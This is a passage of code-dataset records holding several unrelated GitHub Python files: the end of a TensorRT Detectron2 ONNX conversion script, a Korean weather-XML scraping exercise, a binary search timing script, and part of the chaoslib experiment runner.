self.graph.find_node_by_op_name(\"Softmax\", \"/roi_heads/Softmax\")\n bbox_pred = self.graph.find_node_by_op_name(\"Gemm\", \"/roi_heads/box_predictor/bbox_pred/Gemm\")\n\n # Linear transformation to convert box coordinates from (TopLeft, BottomRight) Corner encoding\n # to CenterSize encoding. 1st NMS boxes are multiplied by transformation matrix in order to\n # encode it into CenterSize format.\n matmul_const = np.matrix('0.5 0 -1 0; 0 0.5 0 -1; 0.5 0 1 0; 0 0.5 0 1', dtype=np.float32)\n matmul_out = self.graph.matmul(\"RPN_NMS/detection_boxes_conversion\", rpn_outputs[1], matmul_const)\n\n # Reshape node that prepares bbox_pred for scaling and second NMS.\n bbox_pred_shape = np.asarray([self.batch_size, self.first_NMS_max_proposals, self.num_classes, 4], dtype=np.int64)\n bbox_pred_reshape = self.graph.op_with_const(\"Reshape\", \"bbox_pred/reshape\", bbox_pred.outputs[0], bbox_pred_shape)\n\n # 0.1, 0.1, 0.2, 0.2 are localization head variance numbers, they scale bbox_pred_reshape, in order to get accurate coordinates.\n scale_adj = np.expand_dims(np.asarray([0.1, 0.1, 0.2, 0.2], dtype=np.float32), axis=(0, 1))\n final_bbox_pred = self.graph.op_with_const(\"Mul\", \"bbox_pred/scale\", bbox_pred_reshape[0], scale_adj)\n\n # Reshape node that prepares cls_score for slicing and second NMS.\n cls_score_shape = np.array([self.batch_size, self.first_NMS_max_proposals, self.num_classes+1], dtype=np.int64)\n cls_score_reshape = self.graph.op_with_const(\"Reshape\", \"cls_score/reshape\", cls_score.outputs[0], cls_score_shape)\n\n # Slice operation to adjust third dimension of cls_score tensor, deletion of background class (81 in Detectron 2).\n final_cls_score = self.graph.slice(\"cls_score/slicer\", cls_score_reshape[0], 0, self.num_classes, 2)\n\n # Create NMS node.\n nms_outputs = self.NMS(final_bbox_pred[0], final_cls_score[0], matmul_out[0], -1, False, self.second_NMS_max_proposals, self.second_NMS_iou_threshold, self.second_NMS_score_threshold, second_nms_threshold, 'box_outputs')\n\n # Create ROIAlign node.\n mask_pooler_output = self.ROIAlign(nms_outputs[1], p2, p3, p4, p5, self.second_ROIAlign_pooled_size, self.second_ROIAlign_sampling_ratio, self.second_ROIAlign_type, self.second_NMS_max_proposals, 'mask_pooler')\n\n # Reshape mask pooler output.\n mask_pooler_shape = np.asarray([self.second_NMS_max_proposals*self.batch_size, self.fpn_out_channels, self.second_ROIAlign_pooled_size, self.second_ROIAlign_pooled_size], dtype=np.int64)\n mask_pooler_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_pooler/reshape\", 
mask_pooler_output, mask_pooler_shape)\n\n # Get first Conv op in mask head and connect ROIAlign's squeezed output to it.\n mask_head_conv = self.graph.find_node_by_op_name(\"Conv\", \"/roi_heads/mask_head/mask_fcn1/Conv\")\n mask_head_conv.inputs[0] = mask_pooler_reshape_node[0]\n\n # Reshape node that is preparing 2nd NMS class outputs for Add node that comes next.\n classes_reshape_shape = np.asarray([self.second_NMS_max_proposals*self.batch_size], dtype=np.int64)\n classes_reshape_node = self.graph.op_with_const(\"Reshape\", \"box_outputs/reshape_classes\", nms_outputs[3], classes_reshape_shape)\n\n # This loop will generate an array used in Add node, which eventually will help Gather node to pick the single\n # class of interest per bounding box, instead of creating 80 masks for every single bounding box.\n add_array = []\n for i in range(self.second_NMS_max_proposals*self.batch_size):\n if i == 0:\n start_pos = 0\n else:\n start_pos = i * self.num_classes\n add_array.append(start_pos)\n\n # This Add node is one of the Gather node inputs, Gather node performs gather on 0th axis of data tensor\n # and requires indices that set tensors to be withing bounds, this Add node provides the bounds for Gather.\n add_array = np.asarray(add_array, dtype=np.int32)\n classes_add_node = self.graph.op_with_const(\"Add\", \"box_outputs/add\", classes_reshape_node[0], add_array)\n\n # Get the last Conv op in mask head and reshape it to correctly gather class of interest's masks.\n last_conv = self.graph.find_node_by_op_name(\"Conv\", \"/roi_heads/mask_head/predictor/Conv\")\n last_conv_reshape_shape = np.asarray([self.second_NMS_max_proposals*self.num_classes*self.batch_size, self.mask_out_res, self.mask_out_res], dtype=np.int64)\n last_conv_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_head/reshape_all_masks\", last_conv.outputs[0], last_conv_reshape_shape)\n\n # Gather node that selects only masks belonging to detected class, 79 other masks are discarded.\n final_gather = self.graph.gather(\"mask_head/final_gather\", last_conv_reshape_node[0], classes_add_node[0], 0)\n\n # Get last Sigmoid node and connect Gather node to it.\n mask_head_sigmoid = self.graph.find_node_by_op_name(\"Sigmoid\", \"/roi_heads/mask_head/Sigmoid\")\n mask_head_sigmoid.inputs[0] = final_gather[0]\n\n # Final Reshape node, reshapes output of Sigmoid, important for various batch_size support (not tested yet).\n final_graph_reshape_shape = np.asarray([self.batch_size, self.second_NMS_max_proposals, self.mask_out_res, self.mask_out_res], dtype=np.int64)\n final_graph_reshape_node = self.graph.op_with_const(\"Reshape\", \"mask_head/final_reshape\", mask_head_sigmoid.outputs[0], final_graph_reshape_shape)\n final_graph_reshape_node[0].dtype = np.float32\n final_graph_reshape_node[0].name = \"detection_masks\"\n\n return nms_outputs, final_graph_reshape_node[0]\n\n # Only Detectron 2's Mask-RCNN R50-FPN 3x is supported currently.\n p2, p3, p4, p5 = backbone()\n rpn_outputs = proposal_generator(anchors, first_nms_threshold)\n box_head_outputs, mask_head_output = roi_heads(rpn_outputs, p2, p3, p4, p5, second_nms_threshold)\n # Append segmentation head output.\n box_head_outputs.append(mask_head_output)\n # Set graph outputs, both bbox and segmentation heads.\n self.graph.outputs = box_head_outputs\n self.sanitize()\n\n\ndef main(args):\n det2_gs = DET2GraphSurgeon(args.exported_onnx, args.det2_config, args.det2_weights)\n det2_gs.update_preprocessor(args.batch_size)\n anchors = det2_gs.get_anchors(args.sample_image)\n 
det2_gs.process_graph(anchors, args.first_nms_threshold, args.second_nms_threshold)\n det2_gs.save(args.onnx)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--exported_onnx\", help=\"The exported to ONNX Detectron 2 Mask R-CNN\", type=str)\n parser.add_argument(\"-o\", \"--onnx\", help=\"The output ONNX model file to write\", type=str)\n parser.add_argument(\"-c\", \"--det2_config\", help=\"The Detectron 2 config file (.yaml) for the model\", type=str)\n parser.add_argument(\"-w\", \"--det2_weights\", help=\"The Detectron 2 model weights (.pkl)\", type=str)\n parser.add_argument(\"-s\", \"--sample_image\", help=\"Sample image for anchors generation\", type=str)\n parser.add_argument(\"-b\", \"--batch_size\", help=\"Batch size for the model\", type=int, default=1)\n parser.add_argument(\"-t1\", \"--first_nms_threshold\", help=\"Override the score threshold for the 1st NMS operation\", type=float)\n parser.add_argument(\"-t2\", \"--second_nms_threshold\", help=\"Override the score threshold for the 2nd NMS operation\", type=float)\n args = parser.parse_args()\n if not all([args.exported_onnx, args.onnx, args.det2_config, args.det2_weights, args.sample_image]):\n parser.print_help()\n print(\"\\nThese arguments are required: --exported_onnx --onnx --det2_config --det2_weights and --sample_image\")\n sys.exit(1)\n main(args)\n", "repo_name": "NVIDIA/TensorRT", "sub_path": "samples/python/detectron2/create_onnx.py", "file_name": "create_onnx.py", "file_ext": "py", "file_size_in_byte": 31433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8187, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.exit", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "detectron2.config.get_cfg", "line_number": 44, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.import_onnx", "line_number": 51, "usage_type": "call"}, {"api_name": "onnx.load", "line_number": 51, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.export_onnx", "line_number": 110, "usage_type": "call"}, {"api_name": "onnx.shape_inference.infer_shapes", "line_number": 111, "usage_type": "call"}, {"api_name": "onnx.shape_inference", "line_number": 111, "usage_type": "name"}, {"api_name": "onnx_graphsurgeon.import_onnx", "line_number": 112, "usage_type": "call"}, {"api_name": "detectron2.engine.defaults.DefaultPredictor", "line_number": 140, "usage_type": "call"}, {"api_name": "detectron2.modeling.build_model", "line_number": 141, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "detectron2.structures.ImageList.from_tensors", "line_number": 153, "usage_type": "call"}, {"api_name": "detectron2.structures.ImageList", "line_number": 153, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 168, "usage_type": "call"}, {"api_name": "onnx_graphsurgeon.export_onnx", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, 
"usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "onnx.save", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 196, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 210, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Constant", "line_number": 225, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 252, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 253, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 255, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 257, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Variable", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 304, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 384, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 385, "usage_type": "attribute"}, {"api_name": "onnx_graphsurgeon.Constant", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 411, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 411, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 425, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 429, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 433, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 437, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 450, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 458, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 473, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 478, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 489, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 489, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 491, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 516, 
"usage_type": "call"}, {"api_name": "sys.exit", "line_number": 529, "usage_type": "call"}]}
+{"seq_id": "17786539515", "text": "# 기상청 날씨 정보 SCraping\n# http://www.kma.go.kr/XML/weather/sfc_web_map.xml\n\nimport urllib.request\nimport xml.etree.ElementTree as et\n'''\n순서 1) urlopen 해주기\n순서 2) read로 2진 데이터로 읽기.\n순서 3) decode로 언어 형식 맞춰주기\n순서 4) 저장.\n'''\n\n\ntry:\n webdata = urllib.request.urlopen(\"http://www.kma.go.kr/XML/weather/sfc_web_map.xml\")\n# print(webdata)\n webxml = webdata.read()\n print(webxml) # 2진 데이타로 읽는다.\n \n webxml = webxml.strip().decode('utf-8')\n print(webxml) #decode로 풀어준다.\n webdata.close()\n \n with open('ftest.xml', mode = 'w', encoding='utf-8') as f:\n f.write(webxml)\n \nexcept Exception as e:\n print('err: ', e)\n \nprint('읽기 성공')\n\nxmlfile = et.parse('ftest.xml')\nroot = xmlfile.getroot()\nprint(root.tag)\nprint(root[0].tag)\n\nprint(root[0][0].attrib)\nprint(root[0][0].attrib.values())\n\nchildren = root.findall(\"{current}weather\")\nprint(children)\n\nfor i in children:\n y = i.get('year')\n m = i.get('month')\n d = i.get('day')\n h = i.get('hour')\n print(str(y) + '년' + str(m) + '월' + str(d) + '일' + str(h) + '시 현재')\n\ndatas=[]\nfor child in root:\n# print(child.tag)\n for i in child:\n# print(i.tag)\n local_name = i.text\n re_ta = (i.get('ta'))\n re_desc = (i.get('desc'))\n datas += [[local_name, re_ta, re_desc]]\n print(local_name + \", 온도:\" + str(re_ta) + \" \" + re_desc)\n \nprint(len(datas))\nprint()\n# 웹 이미지 읽기\n# https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png\nurl = \"https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png\"\nsave_name = \"test1.png\"\n\n# 다운로드 방법1.\nurllib.request.urlretrieve(url, save_name) # 다운로드 후 바로 저장함.\nprint('다운로드 후 저장 성공')\n\n# 다운로드 방법2. \nsava_name = \"test2.png\"\nimsi = urllib.request.urlopen(url).read() #메모리(램)으로 올린 후 저장한다,\n\nwith open(save_name, mode='wb') as f:\n f.write(imsi)\n print('저장완료!')\n\n\n\n\n\n \n \n \n ", "repo_name": "chul5775/python_study", "sub_path": "ex5_Web/scrap2_weather.py", "file_name": "scrap2_weather.py", "file_ext": "py", "file_size_in_byte": 2131, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urllib.request.request.urlopen", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 15, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 32, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 32, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 69, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 69, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 69, "usage_type": "name"}, {"api_name": "urllib.request.request.urlopen", "line_number": 74, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 74, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "5621762384", "text": "import random\nimport time\nimport functools\nx = [random.randint(1,1000000) for i in range(1000000)]\nx.sort()\n#print(x)\ndef timer(func):\n functools.wraps(func)\n def wr(*a):\n start = time.time()\n rv = func(*a)\n end = time.time()\n #print('elapsed: ',end-start)\n return rv\n return wr\n\n#@timer\ndef findThis(x,n):\n# print('-----------------------------------------------------------------------------------------')\n l = len(x)\n if l == 0:\n# print('N not found in the list')\n return False\n if l==1:\n if x[0] != n:\n# print('N not found in the list')\n return False\n else:\n# print('Found N')\n return True\n mid = x[l//2]\n# print('mid = : ',mid,'x[{}]'.format(l//2))\n if mid == n:\n# print('find :',n)\n return True\n if mid < n:\n# print('mid < n ,original x = :',x)\n# print('l =:', l//2)\n x = x[l//2:] #slice original list x . leave the half part that includes n.\n# print('new x =: ',x) \n return findThis(x,n)\n if mid > n:\n# print('mid >n, original x = :',x) \n# print('l =:', l//2) \n x = x[:l//2] #slice original list x . leave the half part that includes n.\n# print('new x = :',x)\n return findThis(x,n)\nstart = time.time()\nprint(findThis(x,25))\nend = time.time()\nprint(end - start)\nprint('+++++++++++++++++++++++++++++++')\n\n#@timer\ndef bSearch(x,n,low,high):\n if low > high:\n return False\n else:\n mid = (low+high)//2\n if n == x[mid]:\n return True\n elif n < x[mid]:\n return bSearch(x,n,low,mid-1)\n else:\n return bSearch(x,n,mid+1,high)\nstart = time.time() \nprint(bSearch(x,25,0,len(x)))\nend = time.time()\nprint(end - start)\n", "repo_name": "opnsesame/Data-Structures-and-Algorithms-Exercises", "sub_path": "test/BinarySearch.py", "file_name": "BinarySearch.py", "file_ext": "py", "file_size_in_byte": 1841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.randint", "line_number": 4, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 12, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "call"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "40412514189", "text": "from abc import ABCMeta\nfrom concurrent.futures import Future, ThreadPoolExecutor, TimeoutError\n\ntry:\n import ctypes\n\n HAS_CTYPES = True\nexcept ImportError:\n HAS_CTYPES = False\nimport platform\nimport threading\nimport time\nfrom datetime import datetime\nfrom typing import Any, Dict, List, Optional\n\nfrom logzero import logger\n\nfrom chaoslib import __version__, substitute\nfrom chaoslib.activity import run_activities\nfrom chaoslib.configuration import load_configuration, load_dynamic_configuration\nfrom chaoslib.control import (\n Control,\n cleanup_controls,\n cleanup_global_controls,\n controls,\n initialize_controls,\n initialize_global_controls,\n)\nfrom chaoslib.exceptions import (\n ChaosException,\n ExperimentExitedException,\n InterruptExecution,\n)\nfrom chaoslib.exit import exit_signals\nfrom chaoslib.hypothesis import run_steady_state_hypothesis\nfrom chaoslib.rollback import run_rollbacks\nfrom chaoslib.secret import load_secrets\nfrom chaoslib.settings import get_loaded_settings\nfrom chaoslib.types import (\n Activity,\n Configuration,\n Dry,\n Experiment,\n Journal,\n Run,\n Schedule,\n Secrets,\n Settings,\n Strategy,\n)\n\n__all__ = [\"Runner\", \"RunEventHandler\"]\n\n\nclass RunEventHandler(metaclass=ABCMeta):\n \"\"\"\n Base class to react to certain, or all, events during an execution.\n\n This is mainly meant for reacting the execution's mainloop. Do not\n implement it as part of an extension, use the Control interface instead.\n \"\"\"\n\n def started(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def running(\n self,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n schedule: Schedule,\n settings: Settings,\n ) -> None:\n pass\n\n def finish(self, journal: Journal) -> None:\n pass\n\n def interrupted(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def signal_exit(self) -> None:\n pass\n\n def start_continuous_hypothesis(self, frequency: int) -> None:\n pass\n\n def continuous_hypothesis_iteration(self, iteration_index: int, state: Any) -> None:\n pass\n\n def continuous_hypothesis_completed(\n self, experiment: Experiment, journal: Journal, exception: Exception = None\n ) -> None:\n pass\n\n def start_hypothesis_before(self, experiment: Experiment) -> None:\n pass\n\n def hypothesis_before_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n pass\n\n def start_hypothesis_after(self, experiment: Experiment) -> None:\n pass\n\n def hypothesis_after_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n pass\n\n def start_method(self, experiment: Experiment) -> None:\n pass\n\n def method_completed(self, experiment: Experiment, state: Any) -> None:\n pass\n\n def start_rollbacks(self, experiment: Experiment) -> None:\n pass\n\n def rollbacks_completed(self, experiment: Experiment, journal: Journal) -> None:\n pass\n\n def start_cooldown(self, duration: int) -> None:\n pass\n\n def cooldown_completed(self) -> None:\n pass\n\n def start_activity(self, activity: Activity) -> None:\n pass\n\n def activity_completed(self, activity: Activity, run: Run) -> None:\n pass\n\n\nclass EventHandlerRegistry:\n def __init__(self):\n self.handlers = []\n\n def register(self, handler: RunEventHandler) -> None:\n self.handlers.append(handler)\n\n def started(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n 
h.started(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def running(\n self,\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n schedule: Schedule,\n settings: Settings,\n ) -> None:\n for h in self.handlers:\n try:\n h.running(\n experiment, journal, configuration, secrets, schedule, settings\n )\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def finish(self, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.finish(journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def interrupted(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.interrupted(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def signal_exit(self) -> None:\n for h in self.handlers:\n try:\n h.signal_exit()\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_continuous_hypothesis(self, frequency: int) -> None:\n for h in self.handlers:\n try:\n h.start_continuous_hypothesis(frequency)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def continuous_hypothesis_iteration(self, iteration_index: int, state: Any) -> None:\n for h in self.handlers:\n try:\n h.continuous_hypothesis_iteration(iteration_index, state)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def continuous_hypothesis_completed(\n self, experiment: Experiment, journal: Journal, exception: Exception = None\n ) -> None:\n for h in self.handlers:\n try:\n h.continuous_hypothesis_completed(experiment, journal, exception)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_hypothesis_before(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_hypothesis_before(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def hypothesis_before_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n for h in self.handlers:\n try:\n h.hypothesis_before_completed(experiment, state, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_hypothesis_after(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_hypothesis_after(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def hypothesis_after_completed(\n self, experiment: Experiment, state: Dict[str, Any], journal: Journal\n ) -> None:\n for h in self.handlers:\n try:\n h.hypothesis_after_completed(experiment, state, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_method(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_method(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def method_completed(self, experiment: Experiment, state: Any = None) -> None:\n for h in self.handlers:\n try:\n h.method_completed(experiment, state)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def 
start_rollbacks(self, experiment: Experiment) -> None:\n for h in self.handlers:\n try:\n h.start_rollbacks(experiment)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def rollbacks_completed(self, experiment: Experiment, journal: Journal) -> None:\n for h in self.handlers:\n try:\n h.rollbacks_completed(experiment, journal)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_cooldown(self, duration: int) -> None:\n for h in self.handlers:\n try:\n h.start_cooldown(duration)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def cooldown_completed(self) -> None:\n for h in self.handlers:\n try:\n h.cooldown_completed()\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def start_activity(self, activity: Activity) -> None:\n for h in self.handlers:\n try:\n h.start_activity(activity)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n def activity_completed(self, activity: Activity, run: Run) -> None:\n for h in self.handlers:\n try:\n h.activity_completed(activity, run)\n except Exception:\n logger.debug(f\"Handler {h.__class__.__name__} failed\", exc_info=True)\n\n\nclass Runner:\n def __init__(self, strategy: Strategy, schedule: Schedule = None):\n self.strategy = strategy\n self.schedule = schedule or Schedule()\n self.event_registry = EventHandlerRegistry()\n\n def __enter__(self) -> \"Runner\":\n return self\n\n def __exit__(self, exc_type: Any, exc_value: Any, tb: Any) -> None:\n self.cleanup()\n\n def register_event_handler(self, handler: RunEventHandler) -> None:\n self.event_registry.register(handler)\n\n def configure(\n self,\n experiment: Experiment,\n settings: Settings,\n experiment_vars: Dict[str, Any],\n ) -> None:\n config_vars, secret_vars = experiment_vars or (None, None)\n self.settings = settings if settings is not None else get_loaded_settings()\n self.config = load_configuration(\n experiment.get(\"configuration\", {}), config_vars\n )\n self.secrets = load_secrets(\n experiment.get(\"secrets\", {}), self.config, secret_vars\n )\n self.config = load_dynamic_configuration(self.config, self.secrets)\n\n def cleanup(self):\n pass\n\n def run(\n self,\n experiment: Experiment,\n settings: Settings = None,\n experiment_vars: Dict[str, Any] = None,\n journal: Journal = None,\n ) -> Journal:\n self.configure(experiment, settings, experiment_vars)\n with exit_signals():\n journal = self._run(\n self.strategy,\n self.schedule,\n experiment,\n journal,\n self.config,\n self.secrets,\n self.settings,\n self.event_registry,\n )\n return journal\n\n def _run(\n self,\n strategy: Strategy,\n schedule: Schedule, # noqa: C901\n experiment: Experiment,\n journal: Journal,\n configuration: Configuration,\n secrets: Secrets,\n settings: Settings,\n event_registry: EventHandlerRegistry,\n ) -> None:\n experiment[\"title\"] = substitute(experiment[\"title\"], configuration, secrets)\n logger.info(\"Running experiment: {t}\".format(t=experiment[\"title\"]))\n\n started_at = time.time()\n journal = journal or initialize_run_journal(experiment)\n event_registry.started(experiment, journal)\n\n control = Control()\n activity_pool, rollback_pool = get_background_pools(experiment)\n hypo_pool = get_hypothesis_pool()\n continuous_hypo_event = threading.Event()\n\n dry = experiment.get(\"dry\", None)\n if dry and isinstance(dry, Dry):\n 
logger.warning(f\"Running experiment with dry {dry.value}\")\n initialize_global_controls(\n experiment, configuration, secrets, settings, event_registry=event_registry\n )\n initialize_controls(\n experiment, configuration, secrets, event_registry=event_registry\n )\n event_registry.running(\n experiment, journal, configuration, secrets, schedule, settings\n )\n\n if not strategy:\n strategy = Strategy.DEFAULT\n\n logger.info(f\"Steady-state strategy: {strategy.value}\")\n rollback_strategy = (\n settings.get(\"runtime\", {}).get(\"rollbacks\", {}).get(\"strategy\", \"default\")\n )\n logger.info(f\"Rollbacks strategy: {rollback_strategy}\")\n\n exit_gracefully_with_rollbacks = True\n\n with_ssh = False\n if strategy != Strategy.SKIP:\n with_ssh = has_steady_state_hypothesis_with_probes(experiment)\n if not with_ssh:\n logger.info(\n \"No steady state hypothesis defined. \" \"That's ok, just exploring.\"\n )\n else:\n logger.info(\"Skipping Steady-State Hypothesis as requested\")\n\n try:\n try:\n control.begin(\n \"experiment\", experiment, experiment, configuration, secrets\n )\n\n state = object()\n if with_ssh and should_run_before_method(strategy):\n state = run_gate_hypothesis(\n experiment, journal, configuration, secrets, event_registry, dry\n )\n\n if state is not None:\n if with_ssh and should_run_during_method(strategy):\n run_hypothesis_during_method(\n hypo_pool,\n continuous_hypo_event,\n strategy,\n schedule,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n\n state = run_method(\n strategy,\n activity_pool,\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n\n continuous_hypo_event.set()\n if journal[\"status\"] not in [\"interrupted\", \"aborted\"]:\n if (\n with_ssh\n and (state is not None)\n and should_run_after_method(strategy)\n ):\n run_deviation_validation_hypothesis(\n experiment,\n journal,\n configuration,\n secrets,\n event_registry,\n dry,\n )\n except InterruptExecution as i:\n journal[\"status\"] = \"interrupted\"\n logger.fatal(str(i))\n event_registry.interrupted(experiment, journal)\n except KeyboardInterrupt:\n journal[\"status\"] = \"interrupted\"\n logger.warning(\"Received a termination signal (Ctrl-C)...\")\n event_registry.signal_exit()\n except SystemExit as x:\n journal[\"status\"] = \"interrupted\"\n logger.warning(f\"Received the exit signal: {x.code}\")\n\n exit_gracefully_with_rollbacks = x.code != 30\n if not exit_gracefully_with_rollbacks:\n logger.warning(\"Ignoring rollbacks as per signal\")\n event_registry.signal_exit()\n finally:\n hypo_pool.shutdown(wait=True)\n\n # just in case a signal overrode everything else to tell us not to\n # play them anyway (see the exit.py module)\n if exit_gracefully_with_rollbacks:\n run_rollback(\n rollback_strategy,\n rollback_pool,\n experiment,\n journal,\n configuration,\n 